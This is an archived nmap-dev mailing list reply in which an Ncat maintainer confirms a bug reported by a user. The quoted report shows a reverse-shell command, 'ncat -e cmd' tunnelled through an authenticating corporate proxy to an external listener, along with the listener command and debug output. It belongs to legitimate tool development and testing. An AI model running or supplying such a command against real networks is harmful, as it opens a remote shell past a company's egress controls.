
List:       nmap-dev
Subject:    Re: NCat Proxy Support - Proxy-Authenticate
From:       David Fifield <david () bamsoftware ! com>
Date:       2010-12-29 17:14:57
Message-ID: 20101229171457.GB3481 () debian ! bamsoftware ! com

On Mon, Dec 06, 2010 at 12:08:40PM +0100, Florian Roth wrote:
> 
> Great!
> I'll test it.
> 
> --- 20min later ---
> 
> It works.
> The only problem I noticed was the executing of a program after the
> connection has been established. 
> 
> What I did:
> 
> === On the system inside the network ===========================
> 
> D:\ncat-win32>ncat.exe -vvv -e cmd --proxy proxy.company.de:8080
> --proxy-auth user:pass 87.106.48.12 443
> 
> Ncat: Version 5.36TEST2 ( http://nmap.org/ncat )
> NCAT DEBUG: Proxy returned status code 407.
> NCAT DEBUG: Reconnection header:
> CONNECT 87.106.48.12:443 HTTP/1.0
> Proxy-Authorization: Basic XxxxXXXxxxxXXXXXxxxX==
> 
> NCAT DEBUG: Proxy returned status code 200.
> NSOCK (0.0000s) Read request from IOD #1 (peer unspecified) (timeout:
> -1ms) EID 10
> NSOCK (0.0000s) Read request for 0 bytes from IOD #2 (peer unspecified)
> EID 18
> NSOCK (36.3590s) Callback: READ SUCCESS for EID 10 [(null):65535] (4
> bytes)
> 
> dir
> 
> NSOCK (36.3590s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 26
> NSOCK (49.9370s) Callback: READ SUCCESS for EID 26 [(null):65535] (11
> bytes)
> 
> systeminfo
> 
> NSOCK (49.9370s) Read request for 0 bytes from IOD #1 [(null):65535] EID
> 34
> 
> === On the external system ======================================
> 
> s15218815:~# ncat -v -l 443
> Ncat: Version 5.35DC1 ( http://nmap.org/ncat )
> Ncat: Listening on 0.0.0.0:443
> Ncat: Connection from 186.23.100.10:39925.
> dir
> systeminfo
> 
> =================================================================
> 
> The commands written on the external system appear in the terminal but
> the "cmd.exe" has not been executed by ncat before so they just
> interchange the characters. 
> I first thought - well - perhaps this feature is not meant to be used on
> a client which connects over a proxy server. Without the proxy server
> between the systems this works like a charm. 
> I thought that the CONNECT request has to be initialized by the internal
> system and therefore there cannot be a command transmitter outside that
> sends the commands inwards.
> Although the characters appear inside while writing on the outside
> system.
> 
> Am I right, or is this a bug?

You are correct, this is a bug. I added a test for it and made a TODO to
fix it.

David Fifield
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/